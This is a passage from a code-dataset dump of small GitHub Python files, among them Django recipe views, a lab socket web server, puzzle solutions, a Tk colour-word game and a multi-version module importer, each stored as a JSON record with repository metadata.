main()\n\n","repo_name":"SenZmaKi/LogYu","sub_path":"logyu.py","file_name":"logyu.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41712967436","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom recipe.forms import RecipeForm, DeleteRecipeForm\nfrom recipe.models import Recipe\n\n\ndef homepage(request):\n recipes = Recipe.objects.all()\n context = {\n 'recipes': recipes\n }\n return render(request, 'index.html', context)\n\n\ndef create_recipe(request):\n if request.method == 'GET':\n form = RecipeForm(label_suffix='')\n return render(request, 'recipe/create.html', {'form': form})\n elif request.method == 'POST':\n form = RecipeForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('homepage')\n\n return render(request, 'recipe/create.html', {'form': form})\n\n\ndef edit_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n\n if request.method == 'GET':\n form = RecipeForm(label_suffix='', instance=recipe)\n context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n return render(request, 'recipe/edit.html', context)\n\n elif request.method == 'POST':\n form = RecipeForm(request.POST, instance=recipe)\n\n if form.is_valid():\n form.save()\n return redirect('homepage')\n\n context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n\n return render(request, 'recipe/edit.html', context)\n\n\ndef delete_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n\n if request.method == 'GET':\n form = DeleteRecipeForm(instance=recipe, label_suffix='')\n context = {\n 'form': form,\n 'recipe_id': recipe.id\n }\n return render(request, 'recipe/delete.html', context)\n elif request.method == 'POST':\n recipe.delete()\n return redirect('homepage')\n\n\ndef details_recipe(request, recipe_id):\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n ingredients_list = recipe.ingredients.split(', ')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list\n }\n return render(request, 'recipe/details.html', context)","repo_name":"dkutelov/django_study_projects","sub_path":"recipes/recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17756690918","text":"#Python 3.7\n\nfrom socket import *\nimport sys, os\nimport re\nimport mimetypes\n\ndef main():\n if(len(sys.argv) < 2):\n print(\"Error!! Usage: Python WebServer.py port\\n\")\n return\n\n port = int(sys.argv[1])\n\n server_socket = socket(AF_INET, SOCK_STREAM)\n server_socket.bind(('127.0.0.1', port))\n\n server_socket.listen(1)\n\n\n while True:\n connection_socket, addr = server_socket.accept()\n data = connection_socket.recv(1024)\n\n\n if data:\n response_line, extra_headers, response_body = handle_request(data)\n connection_socket.send(response_line.encode())\n connection_socket.send(extra_headers.encode())\n connection_socket.send(response_body)\n\n connection_socket.close()\n\ndef handle_request(data):\n data = data.decode()\n lines = data.split('\\r\\n')\n request = lines[0]\n\n file = re.search('GET /(.+) HTTP/1.1', request).group(1)\n \n if os.path.exists(file):\n response_line = \"HTTP/1.1 {} {}\\r\\n\".format(200,'OK')\n content_type = mimetypes.guess_type(file)[0] or 'text/html'\n extra_headers = \"Content-Type: {}\\r\\n\\r\\n\".format(content_type)\n\n with open(file, 'rb') as f:\n response_body = f.read()\n else:\n response_line = \"HTTP/1.1 {} {}\\r\\n\".format(404,'Not Found')\n extra_headers = \"Content-Type: text/html\\r\\n\\r\\n\"\n response_body = \"

404 Not Found

\".encode()\n\n return response_line, extra_headers, response_body\n\nif __name__ == \"__main__\":\n main()","repo_name":"garyCC227/comp3331","sub_path":"lab3_temp/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6637091727","text":"import sys\r\nimport math\r\nimport re\r\n\r\n\r\ndef get_data(my_file):\r\n with open(my_file) as f:\r\n line = f.read()\r\n matches = list(map(int, re.findall(r\"([-0-9]+)\", line)))\r\n return matches\r\n\r\n\r\ndef get_number(x_target, y_target):\r\n y_max = max(abs(y_target[0]), abs(y_target[1]))\r\n y_min = min(abs(y_target[0]), abs(y_target[1]))\r\n x_max = max(abs(x_target[0]), abs(x_target[1]))\r\n x_min = min(abs(x_target[0]), abs(x_target[1]))\r\n a_number = 0\r\n n = 0\r\n velocities = list()\r\n while True:\r\n n_number = 1\r\n y_lower = math.ceil(n / 2 - y_max / (n + 1))\r\n y_upper = math.floor(n / 2 - y_min / (n + 1))\r\n x_lower = math.ceil(x_min / (n + 1) + n / 2)\r\n x_upper = math.floor(x_max / (n + 1) + n / 2)\r\n if n >= x_upper:\r\n x_lower, x_upper = 16, 17\r\n if y_upper >= y_lower:\r\n n_number *= (y_upper - y_lower + 1)\r\n else:\r\n n_number = 0\r\n if x_upper >= x_lower:\r\n n_number *= (x_upper - x_lower + 1)\r\n if n_number > 0:\r\n for x in range(x_lower, x_upper + 1):\r\n for y in range(y_lower, y_upper + 1):\r\n if (x, y) not in velocities:\r\n velocities.append((x, y))\r\n a_number += n_number\r\n if y_lower > y_max:\r\n break\r\n n += 1\r\n return a_number, velocities\r\n\r\n\r\ndef main(my_file):\r\n target = get_data(my_file)\r\n x_target = target[0:2]\r\n y_target = target[2:]\r\n a_number, velocities = get_number(x_target, y_target)\r\n print(len(velocities))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) > 1:\r\n filename = sys.argv[1]\r\n else:\r\n filename = \"17_input.txt\"\r\n main(filename)\r\n","repo_name":"krzyssikora/advent_of_code","sub_path":"aoc_2021/17_2_probe.py","file_name":"17_2_probe.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2575971827","text":"'''\n\nLargest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins\n\nImagine we have only 5- and 7-coins. One can prove that any large \nenough integer amount can be paid using only such coins. Yet clearly we \ncannot pay any of numbers 1, 2, 3, 4, 6, 8, 9 with our coins. \nWhat is the maximum amount that cannot be paid?\n\n'''\n\ndef change(amount):\n \n # assert(amount >= 5 \n # and amount != 9\n # and amount != 11\n # and amount != 13\n # and amount != 16\n # and amount != 18\n # )\n \n if(amount < 5):\n return ['X']\n \n if amount == 5:\n return [5]\n \n if amount == 7:\n return [7]\n \n if amount == 10:\n return [5,5]\n \n if amount == 12:\n return [5,7]\n \n if amount == 12:\n return [5,7]\n \n if(amount % 5 == 0):\n coins = change(amount - 5)\n coins.append(5)\n else:\n coins = change(amount - 7)\n coins.append(7)\n return coins\n \nresult = []\nfor i in range(1000):\n result.append(change(i))\n \ncount = 0\nfor i in result:\n if('X' in i):\n print(count, i)\n count += 1\n \n","repo_name":"vasidzius/Introduction-to-Discrete-Mathematics-for-Computer-Science","sub_path":"Course-1-Mathematical-Thinking-in-Computer-Science/Largest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins.py","file_name":"Largest-Amount-that-Cannot-Be-Paid-with-5-and-7-Coins.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22166698378","text":"class Pair:\r\n def __init__(self, v, w):\r\n self.first = v\r\n self.second = w\r\n\r\n def __str__(self):\r\n return \"<\" + str(self.first) + \",\" + str(self.second) + \">\"\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\nclass Graph:\r\n def __init__(self, V, dir):\r\n self.list = []\r\n for _ in range(V):\r\n self.list.append([].copy())\r\n self.num_vertices = V\r\n self.directed = dir\r\n\r\n # dummy values\r\n self.parent = [-1]*V\r\n self.visited = [0]*V\r\n self.depth = [-1]*V\r\n\r\n def connect(self, a, b, w = 1):\r\n self.list[a].append(Pair(b, w))\r\n if not self.directed:\r\n self.list[b].append(Pair(a, w))\r\n\r\n def BFS(self, s):\r\n self.visited = [0]*self.num_vertices\r\n\r\n q = []\r\n q.append(s)\r\n self.visited[s] = 1\r\n self.depth[s] = 0\r\n\r\n while q:\r\n u = q.pop(0)\r\n for i in range(len(self.list[u])):\r\n if self.visited[self.list[u][i].first] == 0:\r\n self.visited[self.list[u][i].first] = 1\r\n self.depth[self.list[u][i].first] = self.depth[u] + 1\r\n q.append(self.list[u][i].first)\r\n\r\n def shortest_path_length(self, v):\r\n return self.depth[v]\r\n\r\nimport sys\r\nn = int(input())\r\nm = []\r\nfor line in sys.stdin:\r\n m.append(line.strip())\r\n\r\ndef knight(r, c):\r\n res = []\r\n for i in [-2, -1, 1, 2]:\r\n for j in [-2, -1, 1, 2]:\r\n if abs(i) + abs(j) == 3:\r\n res.append((r + i, c + j))\r\n return res\r\n\r\ng = Graph(n**2, False)\r\nfor i in range(n):\r\n for j in range(n):\r\n if m[i][j] == 'K':\r\n source = i * n + j\r\n if m[i][j] != '#':\r\n for r, c in knight(i, j):\r\n if r in range(n) and c in range(n) and m[r][c] != '#':\r\n g.connect(r*n + c, i*n + j)\r\ng.BFS(source)\r\nprint(g.shortest_path_length(0))","repo_name":"RussellDash332/kattis","sub_path":"src/Knight Jump/knightjump.py","file_name":"knightjump.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"8249483038","text":"# fmt:off\nfrom torch_uncertainty.datasets.regression.toy import Cubic\n\n\n# fmt:on\nclass TestCubic:\n \"\"\"Testing the Cubic dataset class.\"\"\"\n\n def test_main(self):\n ds = Cubic(num_samples=10)\n _ = ds[9]\n _ = len(ds)\n","repo_name":"ENSTA-U2IS/torch-uncertainty","sub_path":"tests/datasets/test_regression_toy.py","file_name":"test_regression_toy.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"40"} +{"seq_id":"3044532163","text":"import json\nimport pickle\n\ndatafile_pi = \"tests/z4_price_info_40.json\"\ndatafile_prod = \"tests/z4_products_40.pkl\"\n\nwith open(datafile_pi, mode=\"r\") as f:\n data = json.load(f)\n\nwith open(datafile_prod, mode=\"rb\") as f:\n prods = pickle.load(f)\n\ndef price_update(product, price_info):\n method = price_info[\"method\"]\n if method == \"add\":\n product[\"price\"] += price_info[\"param\"]\n elif method == \"sub\":\n product[\"price\"] -= price_info[\"param\"]\n elif method == \"percent+\":\n product[\"price\"] *= (1 + price_info[\"param\"])\n elif method == \"percent-\":\n product[\"price\"] *= (1 - price_info[\"param\"])\n\n #return product\n return 1\n\n\npid = {}\n\nfor v in data:\n pid[v['name']] = v\n\n# V1\n# [price_update(v, pid[v['name']]) for v in prods]\n\n# V2\n# t = map(lambda v: price_update(v, pid[v['name']]), prods)\n# print(set(t))\n\n# V3\nfor v in prods:\n price_update(v, pid[v['name']])\n\nwith open(datafile_prod + \"_out\", \"wb\") as f:\n pickle.dump(prods, f)\n\n\n# DBG\n#with open(datafile_prod + \"_out\", mode=\"rb\") as f:\n# prods = pickle.load(f)\n#print(prods)\n","repo_name":"AAEfimov/Data_Eng","sub_path":"practice_2/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"45382052195","text":"import argparse\nimport joblib\nimport numpy as np\n\n# Load the saved model\nloaded_model = joblib.load('iris_model.pkl')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Predict Iris Flower Species')\n\n # Define command-line arguments for input features\n parser.add_argument('--sepal_length', type=float,\n required=True, help='Sepal length in cm')\n parser.add_argument('--sepal_width', type=float,\n required=True, help='Sepal width in cm')\n parser.add_argument('--petal_length', type=float,\n required=True, help='Petal length in cm')\n parser.add_argument('--petal_width', type=float,\n required=True, help='Petal width in cm')\n\n args = parser.parse_args()\n\n # Collect input features\n input_features = np.array([[\n args.sepal_length,\n args.sepal_width,\n args.petal_length,\n args.petal_width\n ]])\n\n # Predict the class\n predicted_class = loaded_model.predict(input_features)\n class_names = ['setosa', 'versicolor', 'virginica']\n\n print(f\"Predicted class: {class_names[predicted_class[0]]}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SajjadAli54/CODING-SAMURAI-INTERNSHIP-TASK","sub_path":"Task 01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3418907616","text":"class Turn:\n\t''' \n\t\tThe Turn class keeps track of whose turn it is, the direction play is going in,\n\t\t the rolls that remain, and the moves made the current turn.\n\t'''\n\trolls = []\n\tmovesMade = []\n\tturn = ''\n\tturnPrint = ''\n\tturnCount = 0\n\tdirection = ''\n\n\tdef __init__(self, starter, homeColor):\n\n\t\t# Set turn and dir variables \n\t\tself.turn = starter\n\t\tself.setTurnPrint()\n\t\tif homeColor == 'b':\n\t\t\tif starter == 'b':\n\t\t\t\tself.direction = 'anti'\n\t\t\telse:\n\t\t\t\tself.direction = 'clock'\n\t\telse:\n\t\t\tif starter == 'b':\n\t\t\t\tself.direction = 'clock'\n\t\t\telse: \n\t\t\t\tself.direction = 'anti'\n\n\tdef setTurnPrint(self):\n\t\tif self.turn == 'b':\n\t\t\tself.turnPrint = 'Black'\n\t\telse:\n\t\t\tself.turnPrint = 'White'\n\t\treturn self.turnPrint\n\n\tdef getTurnPrint(self):\n\t\treturn self.turnPrint\n\n\tdef getTurn(self):\n\t\treturn self.turn\n\n\tdef setRolls(self, newRolls):\n\t\tself.movesMade = []\n\t\tself.rolls = newRolls\n\t\treturn\n\n\tdef appendRoll(self, roll):\n\t\tself.rolls.append(roll)\n\t\treturn\n\n\tdef removeRoll(self, roll):\n\t\tself.rolls.remove(roll)\n\t\treturn\n\n\tdef printRoll(self):\n\t\tmsg = ''\n\t\tfor roll in self.rolls:\n\t\t\tmsg += str(roll) + ' '\n\t\treturn msg\n\n\tdef getDirection(self):\n\t\treturn self.direction \n\n\tdef nextTurn(self):\n\t\tif self.turn == 'b':\n\t\t\tself.turn = 'w'\n\t\telse:\n\t\t\tself.turn = 'b'\n\n\t\tif self.direction == 'anti':\n\t\t\tself.direction = 'clock'\n\t\telse:\n\t\t\tself.direction = 'anti'\n\n\t\tself.setTurnPrint()\n\n\t\treturn self.turn","repo_name":"burnsnoss/GammonHub","sub_path":"class/Turn.py","file_name":"Turn.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30807255515","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport yaml\n\n\ndef main():\n std_input = \"\"\n while True:\n try:\n line = input()\n except EOFError:\n break\n std_input += line\n\n try:\n json_in = json.loads(std_input)\n print(yaml.dump(json_in))\n except json.JSONDecodeError as e:\n print(\"No valid json: {}\".format(e.msg))\n except Exception as e:\n print(\"Error: {}\".format(e.msg))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"mocanug/yq","sub_path":"json2yaml.py","file_name":"json2yaml.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72930118521","text":"import re\nimport pandas as pd\nimport tempfile\nfrom pathlib import Path\n\n# model_params = {\"pipeline\": \"entity,quote,supersense,event,coref\", \"model\": \"big\"}\n# booknlp = BookNLP(\"en\", model_params)\n\nwith open(\"/Users/josca/projects/1729/news/data/nlp/stopwords.text\") as f:\n stopwords = f.read().split(\"\\n\")\n\n\ndef char_id2quotee(char_id, df_ents):\n names_possible = df_ents[\n (df_ents[\"COREF\"] == char_id)\n & (df_ents[\"text\"].str.lower().isin(stopwords) == False)\n ]\n if names_possible.empty:\n return \"unknown\"\n else:\n return names_possible[\"text\"].value_counts().index[0]\n\n\ndef add_quotee(df_quotes, df_ents):\n char_id2quotee_mapping = {}\n for char_id in df_quotes[\"char_id\"].unique():\n char_id2quotee_mapping[char_id] = char_id2quotee(char_id, df_ents)\n df_quotes[\"quotee\"] = df_quotes[\"char_id\"].map(char_id2quotee_mapping)\n return df_quotes\n\n\ndef get_article_quotes(dir_path):\n df_quotes = pd.read_csv(dir_path / \"book.quotes\", sep=\"\\t\")\n df_ents = pd.read_csv(dir_path / \"book.entities\", sep=\"\\t\")\n df_quotes = add_quotee(df_quotes, df_ents)\n return df_quotes\n\n\n# def extract_quotes(text):\n# with tempfile.TemporaryDirectory() as tmp_dir:\n# dir_path = Path(tmp_dir)\n\n# input_file = dir_path / \"input_file.txt\"\n# with input_file.open(\"a\") as f:\n# f.write(text)\n\n# booknlp.process(input_file, dir_path, \"book\")\n\n# df_quotes = get_article_quotes(dir_path)\n\n# return df_quotes\n","repo_name":"josca42/news","sub_path":"news/nlp/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20397934611","text":"import os\nimport sys\nimport imp\nimport importlib\n\n\"\"\"\nMulti version module import support\n\"\"\"\n\nNAMESPACE = \"vimport.namespace\"\n\nmulti_version_space = imp.new_module(NAMESPACE)\nmulti_version_space.__path__ = []\nmulti_version_space.__cache__ = {}\nmulti_version_space.__map__ = {}\n\nsys.modules[NAMESPACE] = multi_version_space\n\n\ndef __module_check(name, version):\n if type(name) is not str:\n raise RuntimeError('module name should be string')\n\n # we will test this later...\n if type(version) is not str:\n raise RuntimeError('version should be string only')\n\n\ndef __internal_version(version):\n return version.replace(\".\", \"_\")\n\n\ndef __version_module_name(name, version):\n return '%s-%s' % (name, version)\n\n\ndef __intern_module_name(name, version):\n return '%s.%s' % (NAMESPACE, __version_module_name(name, __internal_version(version)))\n\n\ndef __real_module_name(name, version):\n return '%s.%s' % (__intern_module_name(name, version), name)\n\n\ndef __is_module_loaded(name, version):\n v_module = __version_module_name(name, version)\n return v_module in sys.modules\n\n\ndef __load_module(name, version):\n v_dir = v_module = __version_module_name(name, version)\n for path in sys.path:\n full_path = os.path.join(path, v_dir)\n if os.path.isdir(full_path):\n intern_name = __intern_module_name(name, version)\n module = imp.new_module(intern_name)\n setattr(multi_version_space, v_module, module)\n module.__path__ = [full_path]\n module.__vname__ = v_module\n sys.modules[module.__name__] = module\n return True\n return False\n\n\ndef unload_all_module(name):\n _map = multi_version_space.__map__\n v_modules = _map.get(name)\n if v_modules:\n for vm, im in v_modules.items():\n multi_version_space.__cache__.pop(vm)\n sys.modules.pop(im)\n _map.pop(name)\n return True\n return False\n\n\ndef unload_module(name, version):\n __module_check(name, version)\n v_module = __version_module_name(name, version)\n i_module = __intern_module_name(name, version)\n _cache = multi_version_space.__cache__\n _map = multi_version_space.__map__\n if name in _map and v_module in _cache:\n _cache.pop(v_module)\n _map.get(name).pop(v_module)\n sys.modules.pop(i_module)\n return True\n return False\n\n\ndef import_module(name, version, force=False):\n __module_check(name, version)\n vmod_name = __version_module_name(name, version)\n imod_name = __intern_module_name(name, version)\n _cache = multi_version_space.__cache__\n _map = multi_version_space.__map__\n\n if force:\n unload_module(name, version)\n\n if vmod_name not in _cache:\n if not __is_module_loaded(name, version):\n if __load_module(name, version):\n real_name = __real_module_name(name, version)\n i_module = importlib.import_module(real_name)\n _cache[vmod_name] = i_module\n _map.setdefault(name, dict()).setdefault(vmod_name, imod_name)\n return _cache.get(vmod_name)\n\n\ndef reload_module(name, version):\n unload_module(name, version)\n return import_module(name, version)\n\n\ndef list_all_version_of_module(name):\n v_modules = multi_version_space.__map__.get(name)\n return list(v_modules.keys()) if v_modules else []\n","repo_name":"xsank/vimport","sub_path":"vimport.py","file_name":"vimport.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"41483682680","text":"'''from time import sleep\nfor i in range(10, -1,-1):\n print(i)\n sleep(1)\nprint('BOMW')\nsleep(0.5)\nprint('CABUM')'''\ns = 0\nc = 0\nfor i in range(3,500,3):\n if i%2 == 1:\n s += i\n c += 1\nprint('A soma entre os {} numeros multiplos de 3 é igual a {}'.format(c,s))","repo_name":"Nathan120/Arq_Python_CursoEmVideo","sub_path":"Curso_Gustavo_Guanabara/Exercicio46.py","file_name":"Exercicio46.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25926175280","text":"from django.urls import path\nfrom . import views\n\napp_name = \"learning_path\"\n\nurlpatterns = [\n path(\"\", views.LearningPathView.as_view(), name=\"paths\"),\n path(\n \"/details/\",\n views.LearningPathDetailView.as_view(),\n name=\"path-detail\",\n ),\n]\n","repo_name":"cbsBiram/xarala__ssr","sub_path":"src/learning_path/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20014805974","text":"#!/usr/bin/python\n__author__ = 'yiqingj'\n\nimport os\nimport sys\n\n\ndef replicate():\n command = '../../bin/osmosis --replicate-apidb authFile=dbAuth.txt allowIncorrectSchemaVersion=true --write-replication workingDirectory=data'\n os.system(command)\n\n\nif __name__ == \"__main__\":\n replicate()","repo_name":"yiqingj/map-delta-update","sub_path":"script/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40159037760","text":"import os\n\nfrom jinja2 import Template\nfrom eng.logging import error, success\n\n\ndef create_folder(folder_path):\n if os.path.isdir(folder_path):\n error(\"Directory {dirName} already exists.\".format(dirName=os.path.abspath(folder_path)))\n os.mkdir(folder_path)\n success(os.path.abspath(folder_path) + \"/\")\n\n\ndef write_file(file_path, content):\n if os.path.isdir(file_path):\n error(\"File {filePath} already exists.\").format(filePath=os.path.abspath(file_path))\n\n with open(file_path, \"a\") as outfile:\n outfile.write(content)\n success(os.path.abspath(file_path))\n\n\ndef read_template(template):\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\")\n filename = template + \".template\"\n\n template_file = os.path.join(template_dir, filename)\n\n if not os.path.isfile(template_file):\n error(\"Unknown template file ({tmpl}).\".format(tmpl=filename))\n\n data = None\n with open(template_file, \"rU\") as infile:\n data = infile.read()\n return Template(data)\n\n\ndef render_app(app_name):\n template = read_template(\"app\")\n ccName = app_name.replace('_', ' ').title().replace(' ', '')\n return template.render(appCamelCase=ccName)\n\n\ndef render_view(view_name):\n template = read_template(\"view\")\n view_title = view_name.replace('_', ' ').title().replace(' ', '')\n view_camel = view_title + 'View'\n return template.render(viewCamelCase=view_camel, viewTitle=view_title)\n\n\ndef render_service(service_name):\n template = read_template(\"service\")\n svc_camel = service_name.replace('_', ' ').title().replace(' ', '') + 'Service'\n return template.render(serviceCamelCase=svc_camel)\n","repo_name":"dalloriam/engel","sub_path":"eng/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"71563995959","text":"# Dependency -> Install pillow module\n# pip install pillow\n\nfrom tkinter import *\nimport random\nimport os\nimport urllib.request as req\ntry :\n from PIL import Image, ImageTk\nexcept:\n os.system('pip3 install pillow')\n from PIL import Image, ImageTK\n\nlist = os.listdir()\nif 'color.png' not in list:\n req.urlretrieve('https://i1.wp.com/www.ed2go.com/blog/wp-content/uploads/2015/01/Color-Logo-Design-Tips.png', 'color.png')\n print('Image Downloaded.')\n\nclass color:\n def __init__(self,root):\n # Declaring Variables\n self.TIME = 60\n self.SPEED = 1000\n self.SCORE = 0\n self.RANDOM1 = random.randint(0,8)\n self.RANDOM2 = random.randint(0,8)\n self.COLOR_LOGO_PATH = 'color.png'\n self.COLOR_TEXT_FONT = ('Monotype Corsiva', -55, 'bold')\n self.ID = None\n self.START_FLAG = True\n\n # Creating Image object for logo\n self.COLOR_LOGO_IMAGE = ImageTk.PhotoImage(Image.open(self.COLOR_LOGO_PATH).resize((150,70)), Image.ANTIALIAS)\n # Declaring Colors and Their Names\n self.COLORS_ON_TEXT = ('red','green','pink','white','black','blue','yellow','orange','purple','brown')\n self.COLORS_NAME = ('red','green','pink','white','black','blue','yellow','orange','purple','brown')\n\n\n # Declaring frames \n self.frame = Frame(root, height=420, width=300)\n self.frame.propagate(0)\n self.frame.pack()\n \n # Declaring Widget\n self.logolabel = Label(self.frame, image = self.COLOR_LOGO_IMAGE)\n self.logolabel.pack(pady=10)\n self.gamelabel = Label(self.frame, text='GAME', font=('Bahnschrift Condensed', -40, 'bold'))\n self.gamelabel.pack()\n self.messagelabel = Label(self.frame, text='TYPE THE COLOR OF THE WORDS\\nNOT THE WORD TEXT', font=('Times New Roman', -15, 'bold'), foreground='skyblue')\n self.messagelabel.pack()\n self.scorelabel = Label(self.frame, text='SCORE: 0', font=('Times New Roman', -20, 'bold'))\n self.scorelabel.pack()\n self.timeleftlabel = Label(self.frame, text='TIME LEFT: 0', font=('Times New Roman', -15))\n self.timeleftlabel.pack()\n self.colorlabel = Label(self.frame, text='-----------', font=self.COLOR_TEXT_FONT)\n self.colorlabel.pack()\n self.textlabel = Label(self.frame, text='ENTER COLOR BELOW :', font=('Times New Roman', -15))\n self.textlabel.pack()\n self.entry = Entry(self.frame)\n self.entry.pack()\n self.startbutton = Button(self.frame, text='Start', font=('Times New Roman', -20), width=10)\n self.startbutton.pack(pady=10)\n self.entry.bind('', self.check)\n\n self.startbutton.bind('', self.startx)\n\n def startx(self, event):\n if self.START_FLAG :\n self.entry.focus_set()\n self.colorlabel.config(text=self.COLORS_NAME[self.RANDOM1], foreground=self.COLORS_ON_TEXT[self.RANDOM2])\n self.START_FLAG = not self.START_FLAG\n self.timeleftlabel.config(text=f'TIME LEFT: {self.TIME}')\n if self.TIME == 0:\n messagebox.showinfo('Game Over',f'Your Score : {self.SCORE}')\n self.SCORE = 0\n self.TIME = 60\n self.timeleftlabel.after_cancel(self.ID)\n self.START_FLAG = True\n else:\n self.TIME=self.TIME-1\n self.ID = self.timeleftlabel.after(1000, lambda: self.startx(event))\n \n def check(self, event):\n COMPARE = self.COLORS_ON_TEXT[self.RANDOM2]\n self.RANDOM1 = random.randint(0,9)\n self.RANDOM2 = random.randint(0,9)\n if self.TIME > 0 and self.entry.get() != '':\n self.colorlabel.config(text=self.COLORS_NAME[self.RANDOM1], foreground=self.COLORS_ON_TEXT[self.RANDOM2])\n if COMPARE == self.entry.get():\n self.SCORE += 1\n else:\n self.SCORE -= 1\n self.entry.delete(0,END)\n self.scorelabel.config(text=f'SCORE: {self.SCORE}')\n \n\nroot = Tk()\nroot.title('CoLoR')\nobj = color(root)\nroot.mainloop()","repo_name":"intizar-khilji/solos","sub_path":"color_1.2.py","file_name":"color_1.2.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12799499675","text":"import os\nimport time\nimport numpy as np\n\n\ndef evaluate(config, wrapper_model, data_loader, device, lg, mode):\n # Initialize metrics\n num_examples = 0\n cl_loss, cl_correct = 0, 0\n adv_loss, adv_correct = 0, 0\n\n # Accumulate loss/accuracy over batches\n for _, (x, y) in enumerate(data_loader):\n x, y = x.to(device), y.to(device)\n\n # Get model output\n wrapper_model.eval()\n output = wrapper_model(x, y)\n\n cl_logits, adv_logits = output[0], output[1]\n cl_loss_batch, adv_loss_batch = output[2], output[3]\n\n # Aggregate clean loss/accuracy\n num_examples += x.shape[0]\n cl_loss += cl_loss_batch.item()\n _, cl_logits_dig = cl_logits.max(1)\n cl_correct += cl_logits_dig.eq(y).float().sum().item()\n\n # Aggregate adversarial loss/accuracy\n adv_loss += adv_loss_batch.item()\n _, adv_logits_dig = adv_logits.max(1)\n adv_correct += adv_logits_dig.eq(y).float().sum().item()\n\n if num_examples >= config['test']['num_sample']:\n break\n\n # Compute average loss/accuracy\n cl_loss, cl_acc = cl_loss/num_examples, cl_correct/num_examples\n adv_loss, adv_acc = adv_loss/num_examples, adv_correct/num_examples\n\n # Print and log loss/accuracy metrics\n lg.print(f'Clean {mode} loss: {cl_loss:.4f}, accuracy: {cl_acc * 100:.2f}')\n lg.print(f'Advers {mode} loss: {adv_loss:.4f}, accuracy: {adv_acc * 100:.2f}')\n return adv_acc\n","repo_name":"wagner-group/dual-domain-at","sub_path":"utils/mdl.py","file_name":"mdl.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"25139616588","text":"# special thanks to the Goby team for this!\nimport aiohttp\nfrom chia.rpc.full_node_rpc_client import FullNodeRpcClient\nimport time\n\nclass LeafletFullNodeRpcClient(FullNodeRpcClient):\n def __init__(self, leaflet_url):\n self.leaflet_url = leaflet_url\n super().__init__()\n self.session = aiohttp.ClientSession()\n self.closing_task = None\n\n\n async def fetch(self, path, request_json):\n async with self.session.post(self.leaflet_url + path, json=request_json) as response:\n response.raise_for_status()\n\n res_json = await response.json()\n if not res_json[\"success\"]:\n raise ValueError(res_json)\n return res_json\n\n","repo_name":"Yakuhito/tibet","sub_path":"leaflet_client.py","file_name":"leaflet_client.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"11860307847","text":"### 프로그래머스 Level1\n### 제일 작은 수 제거하기 (연습문제)\n### https://programmers.co.kr/learn/courses/30/lessons/12935?language=python3\n\n\ndef solution(arr):\n arr.remove(min(arr))\n return arr if len(arr) else [-1]\n\n\nif __name__ == 